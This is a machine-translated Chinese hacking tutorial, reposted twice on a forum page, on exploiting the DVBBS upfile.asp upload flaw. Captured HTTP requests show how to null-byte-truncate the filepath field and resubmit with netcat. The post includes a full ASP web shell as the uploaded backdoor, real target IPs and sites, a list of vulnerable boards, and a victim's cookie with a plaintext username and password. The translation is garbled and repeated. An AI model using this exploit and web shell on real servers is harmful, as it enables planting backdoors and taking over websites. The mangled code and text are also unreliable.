Upfile cookies submitted (classic too classic)

Author:

SWAP

category:

Vulnerability database

Release date:

2004-10-29 22:26:53

Total browsing:

1

Tip, the three uses of the method of submission of UPLOAD.ASP UPLOAD.HTM UPFILE.ASP Upfile.htm Cookies to find a point, http: //218.27.1.210/admin/upload.asp, casual A horse, mm.asp, and listens for WSocKexpert.

Intercept information Save to a.txt POST /ADMIN/upfile.asp http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / vnd.ms-powerpoint, application / vnd. MS-Excel, Application / Msword, Application / X-Shockwave-Flash, * / * Referer: http://218.27.1.210/admin/upload.asp accept-language: zh-cn content-type: multipart / form-data Boundary = -------------------------- 7D4BC1200E8 Accept-Encoding: Gzip, Deflate User-agent: mozilla / 4.0 (Compatible; Msie 6.0) ; Windows NT 5.1; Maxthon) Host: 218.27.1.210 Content-Length: 1641 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDAASRSRST = BIFOBMEAIPKGAHDBLHJJJFEE ---------------- ------------- 7D4BC1200E8 Content-disposition: form-data; name = "filepath" ../pic/ ------------------ ------------ 7D4BC1200E8 Content-Disposition: form-data; name = "ACT" strange, how do you have a line of 2004xxxxxx's upload file? ? ? Upload ---------------------------- 7D4BC1200E8 Content-Disposition: form-data; name = "file1"; filename = "C: /css3.asp "Content-Type: Text / Plain <% DIM OBJFSO%> <% DIM FDATA%> <% DIM ObjcountFile%> <% on error resume next%> <% set objfso = server.createObject (" scripting. FilesystemObject ")%> <% if Trim (Request (" syfdpath ")) <>" "" "<% fdata = request (" cyfddata ")%> <% set objcountfile = objfso.createtextfile (Request (" SyfdPath " ), True> <% ObjcountFile.write fdata%> <% if err = 0 THEN%> <% response.write " SAVE SUCCESS! "%> <% ELSE%> <% response.write save unsuccess! %> <% end if%> <% err.clear%> <

% END IF%> <%> <%> set objcountfile = not%> <% set objfso = not%> <% response.write "

"%> < % Response.write "Save the absolute path (including file name: D: /web/x.asp): "%> <% response.write "%> <%"
"%> <% response.write" This file absolute path "%> <% = server.mappath (Request.ServerVariables" Script_name "))%> <%"
"%> <% response.write" Enter Ma's content: "%> <% response.write </ textarea> "%> <% response.write" <input type = submit value = save> "%> <% response.write" </ form> "%> --------- -------------------- 7D4BC1200E8 Content-Disposition: form-data; name = "submit" upload --------------- -------------- 7D4BC1200E8 - This time, modifying uploading can be divided into three 1. You can modify this in content-disposition: form-data; name = "filepath"., For example, modified to content-disposition: form-data; name = "filepath" ../pic/xx.asp Xx.asp is of course the back door we want to pass, pay attention to reserve a space back. You can use the UE to open, modify the HEX space 20 is 00 and modify the C: /Css3.asp to CSS3.GIF or other system to allow upload suffix formats. And modify Content-Length: 1641 Length plus 5 is 1646 Content-Disposition: form-data; name = "file1"; filename = "c: /css3.asp" Content-Type: Text / Plain 2. Can directly modify upload ---------------------------- 7D4BC1200E8 7D4BC1200E8 is the file we have uploaded, directly modify it to XX .asp, pay attention to space. Because the length of the front and rear, it is not necessary to modify the length of the LengHT. Modify other and upload. 3.</p> <p>Modify the last C: /Css3.asp to "c: /css3.asp .gif", add the Length length 5, and upload. Revision</p> <p>Upfile Cookies submitted</p> <p>Author:</p> <p>SWAP</p> <p>category:</p> <p>Vulnerability database</p> <p>Release date:</p> <p>2004-10-29 22:26:53</p> <p>Total browsing:</p> <p>10</p> <p>I didn't leave God blog, I was forwarded to Hackbase.com, sweating! There are several places that have not been modified. Now it is now changed, generally submits the three kinds of use of the submission of UPLOAD.ASP UPLOAD.HTM UPFILE.ASP Upfile.htm Cookies to find a point, http: //200.200 . 200.200 / admin / upload.asp, just submit a horse, mm.asp, and listen to WSocKexpert.</p> <p>Intercept information Save to a.txt POST /ADMIN/upfile.asp http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / vnd.ms-powerpoint, application / vnd. MS-Excel, Application / Msword, Application / X-Shockwave-Flash, * / * Referer: http://218.27.1.210/admin/upload.asp accept-language: zh-cn content-type: multipart / form-data Boundary = -------------------------- 7D4BC1200E8 Accept-Encoding: Gzip, Deflate User-agent: mozilla / 4.0 (Compatible; Msie 6.0) ; Windows NT 5.1; Maxthon) Host: 218.27.1.210 Content-Length: 1641 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDAASRSRST = BIFOBMEAIPKGAHDBLHJJJFEE ---------------- ------------- 7D4BC1200E8 Content-disposition: form-data; name = "filepath" ../pic/ ------------------ ------------ 7D4BC1200E8 Content-Disposition: form-data; name = "ACT" strange, how do you have a line of 2004xxxxxx's upload file? ? ? I add a one, for example: 200435234523 Upload ---------------------------- 7D4BC1200E8 Content-Disposition: Form-Data; Name = "File1 "; FileName =" c: / c: / c: text / place <% DIM objfso%> <% DIM fdata%> <% DIM objcountfile%> <% on error resume next%> <% set objfso = Server.createObject ("scripting.filesystemObject")%> <% if Trim (Request ("syfdpath")) <> "" "<% fdata = request (" cyfddata ")%> <% set objcountfile = Objfso. CreateTextFile (Request ("SyfdPath", True)%> <% ObjcountFile.Write FDATA%> <% if Err = 0 THEN%> <% response.write "<font color = red> save success! </ Font>" %> <% ELSE%> <font color = red> save unsuccess! </ font>%> <% end if%> <</p> <p>% err.clear%> <% end if%> <% ObjcountFile.close%> <% set objcountfile = not%> <% set objfso = nothing%> <% response.write "<form action = '' 'Method = POST> "%> <% response.write" save file <font color = red> absolute path (including file name: D: /web/x.asp): </ font> "%> <% response. Write "<input type = text name = syfdpath width = 32 size = 50>"%> <%> <%> <% "write "<br>"%> <% response.write "This file absolute path"%> <% = Server. Mappath ("Script_name"))%> <% ") <br>"%> <% response.write "input horse content:"%> <% response.write <textarea name = cyfddata COLS = 80 rows = 10 width = 32> </ textarea> "%> <% response.write" <input type = submit value = Save> "%> <% response.write" </ form> "%> -------------------------- 7D4BC1200E8 Content-Disposition: form-data; name = "submit" upload -------- -------------------- 7D4BC1200E8 - This time, modifying uploading can be divided into three 1. You can modify this in content-disposition: form-data; name = "filepath"., For example, modified to content-disposition: form-data; name = "filepath" ../pic/xx.asp Xx.asp is of course the back door we want to pass, pay attention to reserve a space back. You can use the UE to open, modify the HEX space 20 is 00 and modify the C: /Css3.asp to CSS3.GIF or other system to allow upload suffix formats. And modify Content-Length: 1641 Length plus 5 is 1646 Content-Disposition: form-data; name = "file1"; filename = "c: /css3.asp" Content-Type: Text / Plain 2. You can directly modify UPLOAD 200435234523 (intercepting the same code like this, because it is 2004 XX month XX day, it will automatically encode into this) here 200435234523 is the file we have uploaded, directly modify it to xx.asp. Pay attention to spaces. Because the length of the front and rear, it is not necessary to modify the length of the LengHT. Modify other and upload. 3.</p> <p>Modify the last C: /Css3.asp to "c: /css3.asp .gif", add the Length length 5, and upload. 2005 3-9 Revision 1 ***. com 80 <1.txt -vv: Back 80: WWW port 1.txt: is the packet you want to send (more usage) WSE (WSOCKEXPERT) to this unit Monitoring, grabbing the packet submitted by IE (not used to search for himself to search online) Second, the principle of vulnerability The following example assumes the premise of the premise WWW host: www. ***. Com; bbs path: / bbs / The vulnerability is derived from the research on the on-board online, it is recommended to have a programming experience to see the Upfile.asp file of DVBBS, and it is not necessary to understand that UpFile is the generation of a Form table, as follows <form name = "form" method = "post" action = "upfile.asp" ...> <input type = "hidden" name = "filepath" value = "uploadface"> <input type = "hidden" name = "ACT" value = "upload"> <input type = "file" name = "file1"> <input type = "hidden" name = "fname"> <input type = "submit" name = "submit" value = "Upload" ...> </ form > Use the variable: filepath default UPLOADFACE Property Hidenact Default UPLOAD Property HidenFile1 is the key you want to pass on this variable! By default, our file is uploaded to www. ***. COM / BBS / UPLOADFACE / The file is named with your upload time, which is filename = formpath & year (now) & month (now) & Second (NOW) & wireNum & Day & Second (No. & Rannum & "." & Fileext --- ----------------------------------- We know that the data in the computer is a "/ 0" as Peugeot Knowing CHAR DATA [] = "BB for use C language S "This DATA array length is 4: B b S / 0 If we construct the filepath as follows, what will it be? FilePath =" / newmm.asp / 0 "</p> <p>We have changed in 2004.09.24.08.24, there is no change: http://www.***.com/bbs/uploadface/200409240824.jpg When we constructed FilePath: http: // www. ***. com / newmm.asp / 0 / 200409240824.jpg This When the server receives filepath data, detected that newmm.asp is understood as filepath's data, which ends the files we upload, such as C: /1.asp is preserved: http://www.***.com/newmm.asp III, after completion of the vulnerability, many websites have made corresponding processing, but there are many websites for FilePath filtering and processing. Just add N HIDEN attribute variables to deal with UPFile.exe published on the Internet, which is the Uttage Utilization tool or FilePath variable utilization tool (veteran) ... but the most basic did not change. . And there are similar vulnerabilities on the plug-in on the website. I want to rely on which dedicated tools you can change the FilePath variables you caught by WSE, and then submit it with NC. . . Even if he adds N hiden variables, it is not necessary.</p> <p>Of course, if you do very stringent filtering for FilePath, our theory will declare the end is the birth of our new theory! Fourth, the vulnerability list http://dvd.3800cc.com/dispbbs.asp?boardid=20&id = 5369 http: //dvd.3800cc.com/dispbbs.asp? BoardId = 20 & id = 5530http: //dvd.3800cc.com/dispbbs.asp? BoardID = 20 & id = 5531Http: //dvd.3800cc.com/dispbbs.asp ? BoardID = 20 & id = 5693 http: //dvd.3800cc.com/dispbbs.asp? BoardId = 20 & id = 5731HTTP: //dvd.3800cc.com/dispbbs.asp? BoardID = 20 & id = 5746 listens outside host nc [-Options] Hostname Port [S] [Ports] ... Monitor local host nc -l -p port [options] [hostname] [port] options: -d Detach from console, stealth mode -e prog inbound program to exec [dangerous !! ] -G Gateway Source-Routing Hop Point [S], Up to 8 -g Num Source-Routing Pointer: 4, 8, 12, ... -H this Cruft -i Secs Delay Interval for Lines Sent, Ports Scanned -l Listen Mode, for Inbound Connects -l Listen Harder, Re-Listen ON Socket Close -N Numeric-Only ip address, NO DNS -O File HEX DUMP OF Traffic -P Port Local Port Number -r Randomize Local and Remote Ports --s Addr Local Source Address -t Answer Telnet Negotiation -u Udp Mode -V Verbose [Use TWICE to Be More Verbose] -w SECS TIMEOUT for Connects and Final Net Reads -z Zero-I / O Mode [Used for Scanning] Port Numbers Can Be Individual or Ranges: Mn [Inclusive]</p> <p>Detailed example: ---------------------------- 1, WSE catching package results (save to 1.txt): POST / BBS /upphoto/upfile.asp http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / x-shockwave-flash, application / vnd.ms-excel, application / vnd.mp -PowerPoint, Application / MSWORD, * / * Referer: http://www.xin126.com/bbs/upphoto/upload.aspaccept-language: en-cncontent-type: multipart / form-data; boundary = ---- ------- 7d423a138d0278Accept-Encoding: gzip, deflateUser-Agent: Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.comContent-Length: 1969Connection: Keep -AliveCache-Control: no-cacheCookie: ASPSESSIONIDACCCCDCS = NJHCPHPALBCANKOBECHKJANF; isCome = 1; GAMVANCOOKIES = 1; regTime = 2004% 2D9% 2D24 3% 3A39% 3A37; username = szjwwwww; pass = 5211314; dl = 0; userID = 62 ; logIntry = 1; userpass = EB03F6C72908FD84 ---------------------------- 7D423A138D0278Content-disposition: form-data; name = "filepath" ../ medias / myphoto / ----------------------------- 7D423A138D0278 ... Upload - ------------- 7D423A1 38D0278 ----------------- Second, UltraEdit opens 1.TXT change data: ......-------------- ------------- 7D423A138D0278Content-disposition: form-data; name = "filepath" /newm.asp█ <=== This black represents a space is 0x20, it is possible to change to 0x00. .....-------------------------- Third, recalculate the cookies length, then NC submit NC -VV www.xin126. COM 80 <1.txtRaEdit is a 16-bit editor online can download us mainly used to write that end conscript: / 0 ====> 16 bits indicate: 0x00 or 00h is actually the endpath's end of FilePath Add a 00 to calculate the cookies length ===> After you change FillePath, it is definitely or or -cookies to change ... Host: www.xin126.comcontent-length: 1969 < ======</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-98808.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="98808" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.044</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'Wo2_2FNdiDXcmGhA3HBie18KzRfmN6T4aoAvFKsl5NzwtNcNdti8Q1I5XaIazauGv2Ca4B9IOFqZnL_2B7fmLUrv3Q_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>